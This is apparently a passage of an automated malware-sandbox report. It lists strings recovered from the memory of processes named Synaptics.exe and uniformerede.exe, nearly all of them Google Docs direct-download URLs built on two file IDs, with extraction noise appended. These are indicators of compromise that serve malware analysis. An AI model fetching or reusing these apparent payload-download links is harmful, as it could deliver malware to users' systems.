Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/dr
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: Synaptics.exe, 00000009.00000000.361451571.000000000868E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357737287.000000000757E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.359584810.0000000009BDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411248230.0000000008E1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352590518.0000000004F2D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.362549509.0000000009A9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371349676.00000000091DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352795877.000000000530D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.351426688.000000000476D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411631790.000000000945E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371160417.0000000008F5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.360559351.000000000743E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.410996975.000000000891E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.354553381.0000000005F0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.384503032.00000000096DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358342707.000000000818E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371594629.000000000959E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.373669676.00000000076BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408212313.000000000506D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.385722874.000000000A49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408502135.000000000568D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo$
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Y6
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Y#
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI#N
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNZ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNw
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU#Z
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ=
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZw
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadana
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadblY
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbw
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
